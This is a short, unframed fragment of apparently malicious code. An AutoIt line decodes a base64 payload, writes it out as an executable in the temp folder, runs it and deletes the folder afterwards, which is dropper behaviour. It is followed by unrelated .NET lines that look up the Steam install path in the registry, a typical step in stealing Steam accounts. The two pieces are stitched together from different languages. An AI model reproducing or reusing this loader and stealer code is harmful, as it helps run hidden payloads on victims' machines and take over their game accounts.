$FILENME = "1239" $FILE = @TempDir & "\" & $FILENME & "\" & $FILENME & ".exe" $FILEOPEND = FileOpen($FILE, 2 + 8) $DECRYPT = _BASE64DECODE($CODE) $EXE = BinaryToString($DECRYPT) $WRITE = FileWrite($FILE, $EXE) FileClose($FILEOPEND) ShellExecute($FILE) DirRemove @TempDir & "\" & $FILENME, 1)
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Valve\\Steam");
string str = Conversions.ToString(registryKey.GetValue("SteamPath", "0"));